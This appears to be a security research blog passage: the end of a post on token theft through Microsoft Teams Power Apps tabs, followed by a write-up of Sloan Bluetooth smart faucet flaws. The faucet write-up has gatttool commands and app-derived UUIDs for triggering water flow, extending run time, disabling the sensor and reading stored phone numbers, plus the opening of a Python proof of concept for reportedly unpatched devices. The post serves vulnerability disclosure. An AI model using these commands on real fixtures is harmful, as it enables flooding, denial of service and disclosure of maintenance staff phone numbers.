Notice that Bad User has logged into the flow.microsoft.com web interface, but Good User, despite having flows in their name listed in admin.powerplatform.microsoft.com, does not show as having a license for Power Automate. This could indicate that the flows were not created intentionally by Good User.

Luckily, the attack is limited to authenticated users within a Teams organization who have the ability to create Power Apps tabs, which means it can’t just be exploited by an untrusted/unauthenticated attacker. However, the permission to create these tabs is enabled by default, so it may be a good idea to consider limiting apps by default and enable them on request.

Takeaways

While that was a long and not quite straightforward attack, the potential impact of such an attack could be huge, especially if it happens to hit an organization administrator. That such a small initial bug (the improper validation of the make.powerapps.com domain) could be traded-up until an attacker is exfiltrating emails, Teams messages, OneDrive and SharePoint files is definitely concerning. It means that even a small bug in a not-so-common service like Microsoft Power Apps could lead to the compromise of many other services by way of token bundles and first party logins for connectors.

So if you happen to find a small bug in one service, see how far you can take it and see if you can trade a small bug for a big impact. There are likely other creative and serious potential attacks we didn’t explore with all of the potential access tokens we were able to steal. Let me know if you spot one 🙂.

Thanks for reading!


Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device ran in a line of SmartFaucets and Flushometers made by Sloan Valve Company. I had to find one I could use for testing. Their connected devices are Sloan SmartFaucets including Optima EAF, Optima ETF/EBF, BASYS EFX (these require an external adapter) and Flushometers such as SOLIS and can be viewed over at https://www.sloan.com/design/connected-products. The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.

SmartFaucet

Sloan EBF615–4 Internals

I managed to acquire a Sloan EBF615–4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800–0000–1000–8000–00805f9b34fb
attr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801–0000–1000–8000–00805f9b34fb
attr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000–1000–8000–00805f9b34fb
attr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c900
attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000–1000–8000–00805f9b34fb
attr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c910
attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c920
attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c940
attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c950
attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c960
attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c970
attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — characteristics
handle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00–0000–1000–8000–00805f9b34fb
handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01–0000–1000–8000–00805f9b34fb
handle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53–88a4–5e37e0326063
handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3–34fc-4045-a5d0–2c581f81a153

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {
    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
getMainViewModel() .getConnectionState() .setValue (ConnectionState.DISPENSING_WATER);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE));
        if (bluetoothGattCharacteristic != null) {
bluetoothGattCharacteristic.setValue(""1"");
        }
        FragmentActivity activity = getActivity();
        if (activity != null) {
            BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
            if (bluetoothLeService != null) {
bluetoothLeService. writeCharacteristic(bluetoothGattCharacteristic);
                return;
            }
            return;
        }
        throw new TypeCastException(""null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity"");
    }
}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = “d0aba888-fb10–4dc9–9b17-bdd8f490c954”;
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = “d0aba888-fb10–4dc9–9b17-bdd8f490c946”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c942”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = “d0aba888-fb10–4dc9–9b17-bdd8f490c916”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = “f89f13e7–83f8–4b7c-9e8b-364576d88334”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use NRF Connect to see what we can do. I’m switching over to NRF Connect from gatttool because it handles the connection easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = “d0aba888-fb10–4dc9–9b17-bdd8f490c965”;

Cool. Let’s write to that UUID. The default value is 30, so, ‘0’ in ASCII. Let’s write 31, or ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, i’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 — char-write-req -a 0x00b3 -n 31

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {
    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");
    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");
    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {
        mainViewModel .getConnectionState() .setValue(ConnectionState.FLUSHING_TOILET);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        bluetoothLeService .writeCharacteristic(bluetoothGattCharacteristic);
    }
}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {
    DeviceData value;
    if (list != null) {
        for (T t : list) {
            Timber.i(“Service: “ + t.getUuid(), new Object[0]);
            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();
            Intrinsics .checkExpressionValueIsNotNull(characteristics, “service.characteristics”);
            for (T t2 : characteristics) {
                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;
                Intrinsics.checkExpressionValueIsNotNull(t2, “characteristic”);
                UUID uuid = t2.getUuid();
                Intrinsics.checkExpressionValueIsNotNull(uuid, “characteristic.uuid”);
                map.put(uuid, t2);
                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {
                    value.setHasSecurity(true);
                }
            }
        }
    }
}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to protect flow rate from being set too high, depending on if we’re using Liters or Gallons.

if (doubleOrNull != null) {
    d = doubleOrNull.doubleValue();
}
if ((valueOf.length() == 0) || d < 1.3d) {
    d = 1.3d;
} else if (d > 9.9d) {
    d = 9.9d;
}
#OR:
if ((valueOf.length() == 0) || d < 0.3d) {
    d = 0.3d;
} else if (d > 2.6d) {
    d = 2.6d;
}

Since this is implemented in the app, I’ll bet the faucet has a much wider range. Of course, flow rate is governed by whatever the line in can support (I’m not a plumber). Flow rate is governed by d0aba888-fb10–4dc9–9b17-bdd8f490c949 characteristic.

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3 byte value, but we can set it to 0x3939 (9.9), and that seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to FF39, the app tries to display it as 0.0. And, we can set it to 9.9 via the app. So, Unless we plug this thing into a water line, we’re not gonna know what happens with the FF39.

Activation Mode

“Activation Mode” controls how long water flows for when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during covid, but I know I can sing happy birthday to myself 2 or three times and still be under that 2 minute mark. Can we set it higher and cause the faucet to flow for a really long time?

There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {
    private static final int METERED_MAX_VALUE = 120;
    public static final int METERED_MODE = 1;
    private static final int MIN_VALUE = 3;
    private static final int ON_DEMAND_MAX_VALUE = 1200;
    public static final int ON_DEMAND_MODE = 0;
}

Unfortunately those safeguards don’t seem to be set anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the different modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c945”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c944”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = “d0aba888-fb10–4dc9–9b17-bdd8f490c943”;
Flow Rate characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ascii. So, Mode is set to 0x30 == “0”, which we can see is ON_DEMAND_MODE. And then the Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting for many minutes for this thing to turn back off.

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, so, about 18 minutes. I wave my hand in front of the faucet’s IR sensor, and grab a cup of coffee. This is gonna take a while…. That didn’t work. It shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to metered and set that pretty high. Seems metered won’t take more than 3 bytes, so I’ll set the first one to 9 for 920 seconds, or ~15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14 min timer and walked away. Annnnd somehow I walked right back in at the 15 minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…

Wet Bandits — Be on the lookout — These criminals are armed and clumsy

DoS

In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0. Now, the faucet won’t turn on no matter how close our hand gets or how vigorously we wave. In this case, we can simply send an 0x30 to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE.

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but could be useful if we were trying to find a specific version. Most BLE enabled devices will expose these via the “Device Information” service. These are separate from that and something Sloan must have thought necessary.

Firmware & Hardware
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c906”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c905”;

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c932”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c930”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92e”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92f”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = “d0aba888-fb10–4dc9–9b17-bdd8f490c929”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92b”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92c”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92d”;
Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855–267–7044. In a real setup, this would be the phone number registered in the app that performed each specific task update. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects OR anyone that reads the characteristic. This isn’t mentioned in the app and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90e”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90d”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = “d0aba888-fb10–4dc9–9b17-bdd8f490c90c”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = “d0aba888-fb10–4dc9–9b17-bdd8f490c90b”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = “d0aba888-fb10–4dc9–9b17-bdd8f490c90F”;

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. Indeed, a quick search reveals this to be Silicon Labs OTA service, giving us insight, also, into the chipset used here. We’ll have to dig into this.

OTA means “Over-The-Air” and is the method to write firmware to various BLE chipsets. As far as I can tell, the different major chipset manufacturers each have their own OTA spec, and they are not interoperable even if they’re called the same thing. Therefore it can be helpful to have chipset specific tools to manipulate OTA. There are often various levels of security that can be added by the developer, including checking firmware signatures or not.

Silicon Labs Gecko bootloader has 3 optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

  • Secure Boot refers to the verification of the authenticity of the application image in main flash on every boot of the device.
  • Secure Firmware Upgrade refers to the verification of the authenticity of an upgrade image before performing a bootload, and optionally enforcing that upgrade images are encrypted.

If none of those are selected by the developer, it’s possible to write any firmware to the device. As the faucet was quite expensive, I did not test firmware update and am merely pointing out that it’s exposed.

Using one of the SILabs android apps, we can quickly see that it’s possible to do an OTA firmware update. No telling what the firmware in place is checking for. I don’t want to break this thing yet.

I also grepped through the android apk but don’t see anything that references the three OTA variable names. I guess they’ll implement updates in the future. This makes me think that the OTA feature uses stock code from the SDK.

Hardware — BLE Adapters

These vulns should be exploitable via any BLE adapter, but since hardware can be finicky, the specific adapters I tested with are:

Cyberkinetic Effects or Why should I even care

Sure, turning on the water might not be the next million dollar ransomware campaign, and flushing the toilets remotely seems like a great prank, but not much more. Still, there can be real interesting effects. First off, these faucets aren’t usually for home use, but installed in office buildings, in groups. Turning on all of the faucets repeatedly or flushing all of the toilets could possibly cause a flooding condition. Move over SYN flood, this is a sink flood.

But these devices aren’t networked! They have no IP! They’re limited by range! These are great points. However, the faucet likely has a 30 foot BLE range. This is well within range of some miscreant standing at their local donut shop near the office. A neighboring unit in a condo or apartment building would also be well within range. Also, most laptops and desktops include bluetooth adapters, so any malware infection is a potential vector. I always like to point out that a BLE device is only a hop away from any modern laptop.

Findings

Enable Water Dispense > Kinetic Effect, Change Flow Rate > Kinetic Effect, Change Activation Mode / Time > Kinetic Effect / DoS, Change Sensor Range to 0 > DoS, Maintenance Person Cell Phone Number Modification and Disclosure > Information Leakage, Enable Toilet Flush > Kinetic Effect, Model Number is writable > Modification of Assumed Immutable Data

PoC || GTFlow

Here’s a quick proof of concept in case you’ve got an unpatched faucet or flushometer lying around. As of this posting, Sloan has not responded to our disclosure emails and to our knowledge has not released an update.

from bluepy.btle import Scanner, DefaultDelegate, Peripheral, UUID, BTLEDisconnectError, BTLEGattError, BTLEManagementError, BTLEInternalError
SCAN_TIMEOUT = 2.0
DEBUG = 0
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c965")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c949")
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c945");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c944");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c943");
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c942");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c906");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c905");
UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER = UUID("00002a24-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c932");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c930");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92e");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92f");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c929");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92b");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92a");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92c");
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c92d");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_FLUSHER_NOTE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88338");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_ACTIVATION_TIME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88337");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88335");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88331");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FIRMWARE_UPDATE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88336");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88334");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_LINE_SENTINAL_FLUSH_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88333");
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88332");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90e");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90d");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90c");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90b");
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c90F");
AQUIS_UUIDS = (
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL,
UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU
)
UUID_CHARACTERISTIC_APP_IDENTIFICATION_LOCK_STATUS = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c953");
